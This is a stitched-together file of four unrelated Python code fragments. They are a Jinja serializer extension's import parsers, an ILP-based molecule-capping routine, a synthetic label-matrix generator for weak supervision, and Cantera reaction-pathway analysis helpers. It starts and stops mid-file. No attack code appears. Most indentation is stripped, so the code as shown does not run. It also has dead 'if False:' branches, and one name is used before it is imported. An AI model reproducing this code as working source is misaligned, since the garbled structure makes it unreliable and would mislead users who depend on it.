[],
[],
macro_body
).set_lineno(lineno),
nodes.Assign(
target,
nodes.Filter(
nodes.Call(
nodes.Name(macro_name, 'load').set_lineno(lineno),
[],
[],
None,
None
).set_lineno(lineno),
filter_name,
[],
[],
None,
None
).set_lineno(lineno)
).set_lineno(lineno)
]
def parse_yaml(self, parser):
import_node = parser.parse_import()
target = import_node.target
lineno = import_node.lineno
return [
import_node,
nodes.Assign(
nodes.Name(target, 'store').set_lineno(lineno),
nodes.Filter(
nodes.Name(target, 'load').set_lineno(lineno),
'load_yaml',
[],
[],
None,
None
)
.set_lineno(lineno)
).set_lineno(lineno)
]
def parse_json(self, parser):
import_node = parser.parse_import()
target = import_node.target
lineno = import_node.lineno
return [
import_node,
nodes.Assign(
nodes.Name(target, 'store').set_lineno(lineno),
nodes.Filter(
nodes.Name(target, 'load').set_lineno(lineno),
'load_json',
[],
[],
None,
None
)
.set_lineno(lineno)
).set_lineno(lineno)
]
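
# Minimal standalone sketch (not part of salt): SerializerExtension registers
# its filters on any Jinja environment, so it can be exercised directly.
#
#     from jinja2 import Environment
#     env = Environment(extensions=[SerializerExtension])
#     print env.from_string('{{ data|json }}').render(data={'foo': True})
#     # -> {"foo": true}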
from typing import Optional, TextIO, Dict, Any, List
from sys import stdout
from fragment_capping.config import ILP_SOLVER_TIMEOUT
from fragment_capping.helpers.types_helpers import Atom, MIN, MAX
from fragment_capping.helpers.parameters import MAX_ABSOLUTE_CHARGE, MIN_ABSOLUTE_CHARGE, MAX_NONBONDED_ELECTRONS, MAX_BOND_ORDER, MIN_BOND_ORDER, VALENCE_ELECTRONS, ELECTRONS_PER_BOND, MUST_BE_INT, ALL_CAPPING_OPTIONS, ELECTRONEGATIVITIES, Capping_Strategy, NO_CAP, new_atom_for_capping_strategy, max_valence_for, min_valence_for
from fragment_capping.helpers.misc import write_to_debug
from fragment_capping.helpers.exceptions import Too_Many_Permutations, Not_Capped_Error
from fragment_capping.helpers.iterables import MAXIMUM_PERMUTATION_NUMBER
def get_best_capped_molecule_with_ILP(
molecule: 'Molecule',
net_charge: Optional[int] = None,
number_hydrogens: Optional[int] = None,
enforce_octet_rule: bool = True,
allow_radicals: bool = False,
debug: Optional[TextIO] = None,
) -> 'Molecule':
'''
Use an ILP to cap (complete the valence of) an uncapped molecule using a library of capping fragments.
Args:
``molecule``: Molecule to be capped. Some of its atoms should have the ``capped`` attribute set to False.
``net_charge``: (Optional) Constrain the total net charge of the capped molecule.
``number_hydrogens``: (Optional) Constrain the total number of hydrogens in the capped molecule (including hydrogens already present in the molecule).
``enforce_octet_rule``: (Optional) Constrain organic elements (H, C, N, O) to satisfy the octet rule.
``allow_radicals``: (Optional) Allow unpaired non-bonded electrons.
``debug``: (Optional) Print very detailed debugging information
Returns:
The modified, capped ``molecule``.
'''
neighbour_counts = molecule.neighbours_for_atoms()
def keep_capping_strategy_for_atom(capping_strategy: Capping_Strategy, atom: Atom) -> bool:
if atom.valence is not None:
if False:
if neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) == atom.valence:
print(atom, capping_strategy)
return neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) == atom.valence
else:
return min_valence_for(atom) <= neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) <= max_valence_for(atom)
def possible_capping_strategies_for_atom(atom: Atom) -> List[Capping_Strategy]:
if debug is not None:
write_to_debug(debug, '')
write_to_debug(debug, atom)
write_to_debug(debug, 'capping_strategy, new_atom_for_capping_strategy(), keep_capping_strategy_for_atom()')
for capping_strategy in ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)]:
write_to_debug(
debug,
capping_strategy,
new_atom_for_capping_strategy(capping_strategy),
keep_capping_strategy_for_atom(capping_strategy, atom)
)
return [
capping_strategy
for capping_strategy in ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)]
if keep_capping_strategy_for_atom(capping_strategy, atom)
]
atoms_need_capping = [atom for atom in molecule.sorted_atoms() if not atom.capped]
assert len(atoms_need_capping) > 0, 'Error: There are no uncapped atoms in the molecule.'
if False:
capping_schemes = list(
product(
*[
possible_capping_strategies_for_atom(atom)
for atom in atoms_need_capping
]
),
)
assert len(capping_schemes) > 0, [
(
atom,
possible_capping_strategies_for_atom(atom),
)
for atom in atoms_need_capping
if len(possible_capping_strategies_for_atom(atom)) == 0
]
write_to_debug(
debug,
[
possible_capping_strategies_for_atom(atom)
for atom in atoms_need_capping
],
)
from pulp import LpProblem, LpMinimize, LpInteger, LpVariable, LpBinary, LpStatus, lpSum
problem = LpProblem("Capping problem for molecule {0}".format(molecule.name), LpMinimize)
ELECTRON_MULTIPLIER = (2 if not allow_radicals else 1)
hydrogens_before_capping = len([1 for atom in molecule.atoms.values() if atom.element == 'H'])
counter_charges = {}
fragment_switches, fragment_scores, fragment_H_scores = {}, {}, {}
capping_atoms_for = {}
new_bonds_sets = {}
for uncapped_atom in atoms_need_capping:
possible_capping_strategies = possible_capping_strategies_for_atom(uncapped_atom)
if len(possible_capping_strategies) == 0 or (len(possible_capping_strategies) == 1 and possible_capping_strategies[0] == NO_CAP):
    stdout.write('\nWarning: No capping strategy for atom: {0}. The ILP will be infeasible if a suitable cap is not available.'.format(uncapped_atom))
else:
for (i, capping_strategy) in enumerate(sorted(possible_capping_strategies), start=1):
write_to_debug(debug, uncapped_atom, capping_strategy, i)
# Add switch variable
fragment_switches[uncapped_atom.index, i] = LpVariable(
'F_{i},{j}'.format(i=uncapped_atom.index, j=i),
0,
1,
LpBinary,
)
new_atoms, new_bonds = molecule.extend_molecule_with(uncapped_atom, capping_strategy)
write_to_debug(debug, i, [atom for atom in new_atoms])
capping_atoms_for[uncapped_atom.index, i] = new_atoms
new_bonds_sets[uncapped_atom.index, i] = [bond for bond in new_bonds if uncapped_atom.index in bond]
fragment_scores[uncapped_atom.index, i] = len(capping_atoms_for[uncapped_atom.index, i])
fragment_H_scores[uncapped_atom.index, i] = len([atom for atom in capping_atoms_for[uncapped_atom.index, i] if atom.element == 'H'])
for capping_atom in new_atoms:
# Add counter-charge variable S_i for every atom of the capping strategy
counter_charges[capping_atom.index] = LpVariable(
"S_{i}".format(i=capping_atom.index),
-MAX_ABSOLUTE_CHARGE,
MAX_ABSOLUTE_CHARGE,
LpInteger,
)
problem += (counter_charges[capping_atom.index] <= (1 - fragment_switches[uncapped_atom.index, i]) * MAX_ABSOLUTE_CHARGE, 'Maximum counter charge for capping atom {element}_{index}'.format(element=capping_atom.element, index=capping_atom.index))
problem += (counter_charges[capping_atom.index] >= -(1 - fragment_switches[uncapped_atom.index, i]) * MAX_ABSOLUTE_CHARGE, 'Minimum counter charge for capping atom {element}_{index}'.format(element=capping_atom.element, index=capping_atom.index))
# Only choose one capping strategy at a time
problem += (lpSum(F_i for ((atom_id, _), F_i) in fragment_switches.items() if atom_id == uncapped_atom.index) == 1, 'Single capping strategy for atom {element}_{index}'.format(element=uncapped_atom.element, index=uncapped_atom.index))
all_capping_atoms = {atom for atoms in capping_atoms_for.values() for atom in atoms}
if True:
molecule.write_graph('debug')
charges = {
atom.index: LpVariable("C_{i}".format(i=atom.index), -MAX_ABSOLUTE_CHARGE, MAX_ABSOLUTE_CHARGE, LpInteger)
for atom in molecule.atoms.values()
}
original_charges = list(charges.values())
# Extra variable use to bind charges
absolute_charges = {
atom_id: LpVariable("Z_{i}".format(i=atom_id), MIN_ABSOLUTE_CHARGE, MAX_ABSOLUTE_CHARGE, LpInteger)
for atom_id in charges.keys()
}
non_bonded_electrons = {
atom_id: LpVariable("N_{i}".format(i=atom_id), 0, MAX_NONBONDED_ELECTRONS // ELECTRON_MULTIPLIER, LpInteger)
for (atom_id, atom) in molecule.atoms.items()
}
# Maps a bond to an integer
bond_mapping = {
bond: i
for (i, bond) in enumerate(molecule.bonds)
}
# Maps an integer to a bond
bond_reverse_mapping = {v: k for (k, v) in bond_mapping.items()}
bond_key = lambda bond: ','.join(map(str, sorted(bond)))
bond_orders = {
bond: LpVariable(
"B_{bond_key}".format(bond_key=bond_key(bond)),
0 if any(bond in new_bonds for new_bonds in new_bonds_sets.values()) else MIN_BOND_ORDER,
MAX_BOND_ORDER,
LpInteger,
)
for bond in molecule.bonds
}
for ((uncapped_atom_id, i), new_bonds) in new_bonds_sets.items():
for new_bond in new_bonds:
problem += (bond_orders[new_bond] >= fragment_switches[uncapped_atom_id, i], 'Minimum bond order for fragment bond {bond_key}'.format(bond_key=bond_key(new_bond)))
problem += (bond_orders[new_bond] <= MAX_BOND_ORDER * fragment_switches[uncapped_atom_id, i], 'Maximum bond order for fragment bond {bond_key}'.format(bond_key=bond_key(new_bond)))
OBJECTIVES = [
MIN(lpSum(absolute_charges.values())),
]
H_size_objective = MAX(lpSum([F_i * fragment_H_scores[uncapped_atom_id, i] for ((uncapped_atom_id, i), F_i) in fragment_switches.items()]))
has_non_null_H_size_objective = (sum([fragment_H_scores[uncapped_atom_id, i] for ((uncapped_atom_id, i), F_i) in fragment_switches.items()]) != 0)
if has_non_null_H_size_objective:
OBJECTIVES.append(H_size_objective)
total_size_objective = MIN(lpSum([F_i * fragment_scores[uncapped_atom_id, i] for ((uncapped_atom_id, i), F_i) in fragment_switches.items()]))
if sum([fragment_scores[uncapped_atom_id, i] for ((uncapped_atom_id, i), F_i) in fragment_switches.items()]) != 0:
OBJECTIVES.append(total_size_objective)
OBJECTIVES.extend([
MIN(lpSum([charge * ELECTRONEGATIVITIES[molecule.atoms[atom_id].element] for (atom_id, charge) in charges.items()])),
MIN(lpSum([bond_order * ELECTRONEGATIVITIES[molecule.atoms[atom_id].element] for (bond, bond_order) in bond_orders.items() for atom_id in bond])),
])
if net_charge is not None:
problem += (lpSum(charges.values()) == net_charge, 'Known net charge')
if number_hydrogens is not None:
problem += (
lpSum(
[
F_i * fragment_H_scores[uncapped_atom_id, i]
for ((uncapped_atom_id, i), F_i) in fragment_switches.items()
],
) + hydrogens_before_capping == number_hydrogens,
'Total number of hydrogens: {0}'.format(number_hydrogens)
)
for atom in molecule.atoms.values():
problem += (
charges[atom.index]
==
VALENCE_ELECTRONS[atom.element]
-
lpSum([bond_orders[bond] for bond in molecule.bonds if atom.index in bond])
-
ELECTRON_MULTIPLIER * non_bonded_electrons[atom.index]
-
(counter_charges[atom.index] if atom.index in counter_charges else 0)
,
'Electron balance for atom {element}_{index}'.format(element=atom.element, index=atom.index),
)
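# (The constraint above is the textbook formal-charge relation
#  C_i = V_i - sum(B_ij) - N_i, extended with the counter charge S_i that
#  neutralises capping atoms of strategies the ILP does not select.)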
# Deal with absolute values
for atom in molecule.atoms.values():
problem += charges[atom.index] <= absolute_charges[atom.index], 'Absolute charge constraint 1 {i}'.format(i=atom.index)
problem += -charges[atom.index] <= absolute_charges[atom.index], 'Absolute charge constraint 2 {i}'.format(i=atom.index)
if enforce_octet_rule and atom not in all_capping_atoms:
if atom.element not in {'B', 'BE', 'P', 'S'}:
problem += (
ELECTRONS_PER_BOND * lpSum([bond_orders[bond] for bond in molecule.bonds if atom.index in bond]) + ELECTRON_MULTIPLIER * non_bonded_electrons[atom.index] == (2 if atom.element in {'H', 'HE'} else 8),
'Octet for atom {element}_{index}'.format(element=atom.element, index=atom.index),
)
try:
problem.sequentialSolve(OBJECTIVES, timeout=ILP_SOLVER_TIMEOUT)
assert problem.status == 1, (molecule.name, LpStatus[problem.status])
#assert False
except Exception as e:
problem.writeLP('debug.lp')
molecule.write_graph('DEBUG', output_size=(1000, 1000))
print('Failed LP written to "debug.lp"')
raise
DELETE_FAILED_CAPS = True
molecule.formal_charges, molecule.bond_orders, molecule.non_bonded_electrons = {}, {}, {}
atoms_to_remove = set()
for v in problem.variables():
variable_type, variable_substr = v.name.split('_')
if variable_type == 'C':
atom_index = int(variable_substr)
molecule.formal_charges[atom_index] = MUST_BE_INT(v.varValue)
elif variable_type == 'B':
if False:
bond_index = int(variable_substr)
molecule.bond_orders[bond_reverse_mapping[bond_index]] = MUST_BE_INT(v.varValue)
else:
bond = frozenset(map(int, variable_substr.split(',')))
molecule.bond_orders[bond] = MUST_BE_INT(v.varValue)
elif variable_type == 'Z':
pass
elif variable_type == 'N':
atom_index = int(variable_substr)
molecule.non_bonded_electrons[atom_index] = MUST_BE_INT(v.varValue) * ELECTRON_MULTIPLIER
elif variable_type == 'F':
uncapped_atom_id, capping_strategy_id = map(int, variable_substr.split(','))
if MUST_BE_INT(v.varValue) == 0 and DELETE_FAILED_CAPS:
atoms_to_remove.add((uncapped_atom_id, capping_strategy_id))
elif variable_type == 'S':
capping_atom_id = int(variable_substr)
else:
raise Exception('Unknown variable type: {0}'.format(variable_type))
if DELETE_FAILED_CAPS:
for (uncapped_atom_id, capping_strategy_id) in atoms_to_remove:
molecule.remove_atoms(atom for atom in capping_atoms_for[uncapped_atom_id, capping_strategy_id])
if not allow_radicals and False:
assert all([nonbonded_electrons % 2 == 0 for nonbonded_electrons in molecule.non_bonded_electrons.values()]), {
molecule.atoms[atom_index]: electrons
for (atom_index, electrons) in molecule.non_bonded_electrons.items()
if electrons % 2 == 1
}
molecule.update_valences()
molecule.assign_aromatic_bonds()
molecule.assert_molecule_coherence()
return molecule
from itertools import product
from functools import reduce
def get_best_capped_molecule(
molecule: 'Molecule',
draw_all_possible_graphs: bool = False,
debug: Optional[TextIO] = None,
use_ILP: bool = True,
**kwargs: Dict[str, Any],
) -> 'Molecule':
'''
Use a brute-force combinatorial enumeration to cap (complete the valence of) an uncapped molecule using a library of capping fragments.
Only meant to be used on very small molecules to compare against the ILP version (``get_best_capped_molecule_with_ILP``).
Args:
``molecule``: Molecule to be capped. Some of its atoms should have the ``capped`` attribute set to False.
``draw_all_possible_graphs``: (Optional) Draw all possible graphs for debug purposes.
``debug``: (Optional) Print very detailed debugging information
``use_ILP``: (Optional) Use an ILP for solving the electron assignment problem.
If set to ``False``, will use a combinatorial enumeration (very slow and error-prone!).
``**kwargs``: (Optional) Additional keyword arguments, which are ignored.
Returns:
The modified, capped ``molecule``.
'''
neighbour_counts = molecule.neighbours_for_atoms()
def keep_capping_strategy_for_atom(capping_strategy: Capping_Strategy, atom: Atom):
if molecule.use_neighbour_valences():
return neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) == atom.valence
else:
return min_valence_for(atom) <= neighbour_counts[atom.index] + new_atom_for_capping_strategy(capping_strategy) <= max_valence_for(atom)
def possible_capping_strategies_for_atom(atom: Atom) -> List[Capping_Strategy]:
if debug is not None:
write_to_debug(debug, atom)
for capping_strategy in ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)]:
write_to_debug(
debug,
capping_strategy,
new_atom_for_capping_strategy(capping_strategy),
keep_capping_strategy_for_atom(capping_strategy, atom)
)
return [
capping_strategy
for capping_strategy in ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)]
if keep_capping_strategy_for_atom(capping_strategy, atom)
]
atoms_need_capping = [atom for atom in molecule.sorted_atoms() if not atom.capped]
capping_schemes = list(
product(
*[
possible_capping_strategies_for_atom(atom)
for atom in atoms_need_capping
]
),
)
assert len(capping_schemes) > 0, [
(
atom,
possible_capping_strategies_for_atom(atom),
)
for atom in atoms_need_capping
if len(possible_capping_strategies_for_atom(atom)) == 0
]
write_to_debug(
debug,
[
possible_capping_strategies_for_atom(atom)
for atom in atoms_need_capping
],
)
if len(capping_schemes) >= MAXIMUM_PERMUTATION_NUMBER:
raise Too_Many_Permutations(len(capping_schemes))
write_to_debug(debug, 'atoms_need_capping: {0}'.format(atoms_need_capping))
write_to_debug(debug, 'capping_schemes: {0}'.format(capping_schemes))
write_to_debug(debug, 'capping_options: {0}'.format([
len(ALL_CAPPING_OPTIONS[molecule.atom_desc(atom)])
for atom in atoms_need_capping
]))
write_to_debug(debug, 'INFO: Will try all {0} possible capped molecules'.format(len(capping_schemes)))
possible_capped_molecules = sorted(
filter(
lambda mol: mol is not None,
[
molecule.capped_molecule_with(capping_strategies, atoms_need_capping, debug=debug, debug_line='molecule {0}/{1}'.format(i, len(capping_schemes)), use_ILP=use_ILP)
for (i, capping_strategies) in enumerate(capping_schemes, start=1)
],
),
key=lambda mol: (mol.net_abs_charges(), mol.n_atoms(), mol.double_bonds_fitness()),
)
write_to_debug(debug, 'Possible capped molecules: {0} ({1}/{2})'.format(
[(mol.formula(charge=True), mol.net_abs_charges(), mol.double_bonds_fitness()) for mol in possible_capped_molecules],
len(possible_capped_molecules),
len(capping_schemes),
))
if draw_all_possible_graphs:
        try:
            for (i, mol) in enumerate(possible_capped_molecules):
                mol.write_graph(i)
except Exception as e:
print(
'ERROR: Could not plot graphs (error was: {0})'.format(
str(e),
),
)
raise
if len(possible_capped_molecules) == 0:
raise Not_Capped_Error(molecule)
best_molecule = possible_capped_molecules[0]
return best_molecule
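# A minimal usage sketch (hypothetical molecule; assumes the same Molecule API
# used above, with some atoms flagged capped=False):
#
#     uncapped = Molecule(...)  # e.g. a methyl fragment with one open valence
#     capped = get_best_capped_molecule(uncapped, use_ILP=True)
#     print(capped.formula(charge=True), capped.net_abs_charges())
#
# Prefer get_best_capped_molecule_with_ILP for anything but tiny molecules:
# the enumeration above grows as the product of the per-atom capping options
# and is cut off at MAXIMUM_PERMUTATION_NUMBER.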
| |
from collections import defaultdict
import numpy as np
import torch
from numpy.random import choice, random
from scipy.sparse import csr_matrix
from metal.multitask.task_graph import TaskHierarchy
from synthetic.words1k import vocab1k
def singletask_synthetic(n, m, k, **kwargs):
data = SingleTaskTreeDepsGenerator(n, m, k, **kwargs)
L = data.L
Y = data.Y
deps = data.E
bags, D = gaussian_bags_of_words(Y, vocab1k, **kwargs)
X = bags_to_counts(bags, len(vocab1k))
return D, L, X, Y, deps
################################################################################
# Helpers
################################################################################
def logistic_fn(x):
return 1 / (1 + np.exp(-x))
def choose_other_label(k, y):
"""Given a cardinality k and true label y, return random value in
{1,...,k} \ {y}."""
return choice(list(set(range(1, k + 1)) - set([y])))
def indpm(x, y):
"""Plus-minus indicator function"""
return 1 if x == y else -1
################################################################################
# Single-task (Ls and Ys)
################################################################################
class SingleTaskTreeDepsGenerator(object):
"""Generates a synthetic single-task L and Y matrix with dependencies
Args:
n: (int) The number of data points
m: (int) The number of labeling sources
k: (int) The cardinality of the classification task
class_balance: (np.array) each class's percentage of the population
theta_range: (tuple) The min and max possible values for theta, the
class conditional accuracy for each labeling source
edge_prob: edge density in the graph of correlations between sources
theta_edge_range: The min and max possible values for theta_edge, the
strength of correlation between correlated sources
The labeling functions have class-conditional accuracies, and
class-unconditional pairwise correlations forming a tree-structured graph.
Note that k = the # of true classes; thus source labels are in {0,1,...,k}
because they include abstains.
"""
def __init__(
self,
n,
m,
k=2,
class_balance=None,
theta_range=(0, 1.5),
edge_prob=0.0,
theta_edge_range=(-1, 1),
**kwargs
):
self.n = n
self.m = m
self.k = k
# Generate correlation structure: edges self.E, parents dict self.parent
self._generate_edges(edge_prob)
# Generate class-conditional LF & edge parameters, stored in self.theta
self._generate_params(theta_range, theta_edge_range)
# Generate class balance self.p
if class_balance is None:
self.p = np.full(k, 1 / k)
else:
self.p = class_balance
# Generate the true labels self.Y and label matrix self.L
self._generate_label_matrix()
# Compute the conditional clique probabilities
self._get_conditional_probs()
# Correct output type
        self.L = csr_matrix(self.L, dtype=int)  # np.int was a deprecated alias for the builtin int
def _generate_edges(self, edge_prob):
"""Generate a random tree-structured dependency graph based on a
specified edge probability.
Also create helper data struct mapping child -> parent.
"""
self.E, self.parent = [], {}
for i in range(self.m):
if random() < edge_prob and i > 0:
p_i = choice(i)
self.E.append((p_i, i))
self.parent[i] = p_i
def _generate_params(self, theta_range, theta_edge_range):
self.theta = defaultdict(float)
for i in range(self.m):
t_min, t_max = min(theta_range), max(theta_range)
self.theta[i] = (t_max - t_min) * random(self.k + 1) + t_min
# Choose random weights for the edges
te_min, te_max = min(theta_edge_range), max(theta_edge_range)
for (i, j) in self.E:
w_ij = (te_max - te_min) * random() + te_min
self.theta[(i, j)] = w_ij
self.theta[(j, i)] = w_ij
def _P(self, i, li, j, lj, y):
return np.exp(
self.theta[i][y] * indpm(li, y) + self.theta[(i, j)] * indpm(li, lj)
)
    def P_conditional(self, i, li, j, lj, y):
        r"""Compute the conditional probability
            P_\theta(li | lj, y)
            =
            Z^{-1} exp(
                \theta_{i|y} \indpm{ \lambda_i = Y }
                + \theta_{i,j} \indpm{ \lambda_i = \lambda_j }
            )
        In other words, compute the conditional probability that LF i outputs
        li given that LF j output lj, and Y = y, parameterized by
        - a class-conditional LF accuracy parameter \theta_{i|y}
        - a symmetric LF correlation parameter \theta_{i,j}
        """
Z = np.sum([self._P(i, _li, j, lj, y) for _li in range(self.k + 1)])
return self._P(i, li, j, lj, y) / Z
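    # Sketch of how P_conditional is consumed below: for data point i with
    # true label y, source j's vote is drawn conditioned on its parent's vote,
    # e.g.
    #
    #     prob_y = self.P_conditional(j, y, p_j, self.L[i, p_j], y)
    #
    # is the probability that source j agrees with the true label; the
    # remaining mass is split between abstain (0) and the k-1 wrong labels.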
def _generate_label_matrix(self):
"""Generate an [n,m] label matrix with entries in {0,...,k}"""
self.L = np.zeros((self.n, self.m))
self.Y = np.zeros(self.n, dtype=np.int64)
for i in range(self.n):
y = choice(self.k, p=self.p) + 1 # Note that y \in {1,...,k}
self.Y[i] = y
for j in range(self.m):
p_j = self.parent.get(j, 0)
prob_y = self.P_conditional(j, y, p_j, self.L[i, p_j], y)
prob_0 = self.P_conditional(j, 0, p_j, self.L[i, p_j], y)
p = np.ones(self.k + 1) * (1 - prob_y - prob_0) / (self.k - 1)
p[0] = prob_0
p[y] = prob_y
self.L[i, j] = choice(self.k + 1, p=p)
def _get_conditional_probs(self):
"""Compute the true clique conditional probabilities P(\lC | Y) by
counting given L, Y; we'll use this as ground truth to compare to.
Note that this generates an attribute, self.c_probs, that has the same
definition as returned by `LabelModel.get_conditional_probs`.
TODO: Can compute these exactly if we want to implement that.
"""
# TODO: Extend to higher-order cliques again
self.c_probs = np.zeros((self.m * (self.k + 1), self.k))
for y in range(1, self.k + 1):
Ly = self.L[self.Y == y]
for ly in range(self.k + 1):
self.c_probs[ly :: (self.k + 1), y - 1] = (
np.where(Ly == ly, 1, 0).sum(axis=0) / Ly.shape[0]
)
class HierarchicalMultiTaskTreeDepsGenerator(SingleTaskTreeDepsGenerator):
def __init__(
self,
n,
m,
theta_range=(0, 1.5),
edge_prob=0.0,
theta_edge_range=(-1, 1),
cardinalities=[2, 3, 3],
edges=[(0, 1), (0, 2)],
):
self.task_graph = TaskHierarchy(cardinalities, edges)
fs = list(self.task_graph.feasible_set())
super().__init__(
n,
m,
k=len(fs),
theta_range=theta_range,
edge_prob=edge_prob,
theta_edge_range=theta_edge_range,
)
L_mt = [np.zeros((self.n, self.m)) for _ in range(self.task_graph.t)]
for i in range(self.n):
for j in range(self.m):
if self.L[i, j] > 0:
y = fs[int(self.L[i, j]) - 1]
for s in range(self.task_graph.t):
L_mt[s][i, j] = y[s]
self.L = list(map(csr_matrix, L_mt))
# Convert Y to a t-length list of n-length vectors
self.Y = [
np.array([fs[y - 1] for y in self.Y]).T[t] for t in range(self.task_graph.t)
]
################################################################################
# Generating Xs and Ds
################################################################################
def gaussian_bags_of_words(Y, vocab=vocab1k, sigma=1, bag_size=[25, 50], **kwargs):
"""
Generate Gaussian bags of words based on label assignments
Args:
Y: np.array of true labels
sigma: (float) the standard deviation of the Gaussian distributions
bag_size: (list) the min and max length of bags of words
Returns:
        X: (list) a list of LongTensors of token indices, one per bag
        D: (list) a list of sentences (strings)
    The sentences are conditionally independent, given a label.
    Note that technically we use a half-normal distribution here because we
    take the absolute value of the normal distribution.
    Example:
        X, D = gaussian_bags_of_words(Y, vocab1k, sigma=1, bag_size=[25, 50])
"""
def make_distribution(sigma, num_words):
p = abs(np.random.normal(0, sigma, num_words))
return p / sum(p)
num_words = len(vocab)
word_dists = {y: make_distribution(sigma, num_words) for y in set(Y)}
bag_sizes = np.random.choice(range(min(bag_size), max(bag_size)), len(Y))
X = []
items = []
for i, (y, length) in enumerate(zip(Y, bag_sizes)):
x = torch.from_numpy(np.random.choice(num_words, length, p=word_dists[y]))
X.append(x)
items.append(" ".join(vocab[j] for j in x))
return X, items
def bags_to_counts(bags, vocab_size):
X = torch.zeros(len(bags), vocab_size, dtype=torch.float)
for i, bag in enumerate(bags):
for word in bag:
X[i, word] += 1
return X
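# End-to-end sketch (names are the functions defined in this module; the
# keyword values are illustrative):
#
#     D, L, X, Y, deps = singletask_synthetic(n=1000, m=10, k=2, edge_prob=0.1)
#     # L: [n, m] sparse label matrix with entries in {0, ..., k} (0 = abstain)
#     # X: [n, len(vocab1k)] float tensor of bag-of-words counts
#     # Y: length-n vector of true labels in {1, ..., k}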
| |
# -*- coding: utf-8 -*-
import numpy as np
import cantera as ct
import pandas as pd
import re
import warnings
import copy
###################################
# 3b. output data analysis
###################################
def branching_ratios(df, solution, compound, production = False):
"""
This method looks at the consumption pathways of `compound` over
all time points in the data set.
It outputs a pandas.DataFrame which contains columns of pertinant reactions
and values of the branching ratio of each reaction which is defined as
$BR_{i} = \frac{ROC_i}{\Sigma_{j=0}^{j=N} ROC_j }$
where $i$ is the reaction in question, $ROC$ is the rate of consumption of
the desired species, and $N$ is the number of reactions, and $BR$ is the branching ratio.
df = dataframe of run data
solution = cantera solution object
compound = species string which you want to identify
production = if True, shows the reactions forming species X
This method only works on forward reactions
"""
reaction_dataframe = weight_reaction_dataframe_by_stoich_coefficients(df,solution,compound)
if not production:
#only keep consumption
consumption_terms = reaction_dataframe[reaction_dataframe < 0]
df = consumption_terms.dropna('columns','all')
else:
production_terms = reaction_dataframe[reaction_dataframe > 0]
df = production_terms.dropna('columns','all')
total = df.sum('columns')
branching_ratios = df.div(total,'index')
branching_ratios = branching_ratios.fillna(0)
#sort from most important
importance_index = branching_ratios.sum('index').sort_values(ascending=False)
branching_ratios = branching_ratios.reindex(importance_index.index,axis='columns')
return branching_ratios
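# Usage sketch (hypothetical data; `df` should hold net reaction rates over
# time with reaction-equation strings as columns, matching `solution`):
#
#     gas = ct.Solution('gri30.cti')
#     br = branching_ratios(df, gas, 'OH')
#     br.iloc[0].head()  # top consumption pathways of OH at the first time point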
def consumption_pathways(solution,df,species, time = 'all'):
"""
returns the total rate of production for a particular species at the specified
    time(s). Positive values indicate production, negative values indicate consumption.
    If multiple times are given or the keyword 'all' is used, the output is a DataFrame
    with the times as its index. If only one time is supplied, the output is a
    Series.
solution = cantera solution object
df = pandas dataframe of reactions
species = string of species
time = number describing the time points to determine consumption (or list of numbers)
"""
if time=='all':
time = list(df.index)
if isinstance(time,list):
# recursively run consumption_pathways
consumption_values = []
for t in time:
consumption_values.append(consumption_pathways(solution=solution,
df=df,
species=species,
time= t))
consumption_values = pd.DataFrame(consumption_values, index=time)
# sort by total sum of flux
sorted_index = consumption_values.sum('index').sort_values().keys()
return consumption_values[sorted_index]
# the time is not a list, return a pd.Series
try:
reactions_weighted = find_reactions(solution, df,species).loc[time,:]
except KeyError:
reactions_weighted = find_reactions(solution, df,species).loc[return_nearest_time_index(time,df.index, index=False),:]
# weight by stoichiometric_coefficients
stoich_coeffs = [obtain_stoichiometry_of_species(solution, species, reaction) for reaction in reactions_weighted.index]
stoich_coeff_dict = pd.Series(dict(zip(reactions_weighted.index,stoich_coeffs)))
# pandas was having some bug, so manually rewrote the line below
#reactions_weighted *= stoich_coeff_dict
for index in stoich_coeff_dict.index:
reactions_weighted[index] *= stoich_coeff_dict[index]
return reactions_weighted.sort_values()
def quasi_steady_state(df, species):
"""
This method outputs the key parameter, $\frac{|ROP-ROC|}{ROP}$, in quasi steady state
approximation.
df = pd.DataFrame containing get_rop_and_roc_series
species = string of species to use
returns a pd.Series of the qss apprixmation: $\frac{|ROP-ROC|}{ROP}$
"""
return (df['production',species] - df['consumption',species]).abs() / df['production',species]
def compare_species_profile_at_one_time(desired_time, df1,df2,
minimum_return_value=1e-13,
time_string = 'time (s)'):
"""
compares the species profile between two models closest to the desired time
returns a pandas.Series object with the relative species concentrations
given by `compare_2_data_sets`
"""
time_index_1 = return_nearest_time_index(desired_time,df1[time_string])
time_index_2 = return_nearest_time_index(desired_time,df2[time_string])
time_slice_1 = find_species(df1).loc[time_index_1]
time_slice_2 = find_species(df2).loc[time_index_2]
return _compare_2_data_sets(time_slice_1,time_slice_2,minimum_return_value)
def _compare_2_data_sets(model1, model2, minimum_return_value = 1000,diff_returned=0.0):
"""given two pd.Series of data, returns a pd.Series with the relative
differences between the two sets. This requires one of the values to be
above the `minimum_return_cutoff` and the difference to be above `diff_returned`
The difference is returned as $\frac{model1 - model2}{\min(model1,model2)}$.
Where the minimum merges the two datasets using the minimum value at each index.
"""
#ensure all values are the same
model1 = copy.deepcopy(model1)[model2.index].dropna()
model2 = copy.deepcopy(model2)[model1.index].dropna()
minimum_value = pd.DataFrame({'model1':model1,'model2':model2}).min(1)
compared_values = ((model1-model2)/minimum_value).dropna()
for label in compared_values.index:
not_enough_value = (model1[label] < minimum_return_value and model2[label] < minimum_return_value)
not_enough_difference = abs(compared_values[label]) < diff_returned
if not_enough_value or not_enough_difference:
compared_values[label] = np.nan
compared_values = compared_values.dropna()
return compared_values.sort_values()
def return_nearest_time_index(desired_time,time_series,index=True):
"""
input the desired time, double, and time_series, pd.Series,
returns the index of the time_series.
If you want the actual time value, change index=False
"""
    # commented out due to error in np.argmin
#nearest_value = lambda value, array: np.argmin(abs(value-array))
#if index:
# return nearest_value(desired_time,time_series)
#return time_series[nearest_value(desired_time,time_series)]
deviation_list = abs(desired_time-time_series)
min_deviation = min(deviation_list)
index_value = list(deviation_list).index(min_deviation)
if index:
return index_value
return time_series[index_value]
def obtain_stoichiometry_of_species(solution, species, reaction):
"""
this method finds a reaction string in the cantera solution file, and
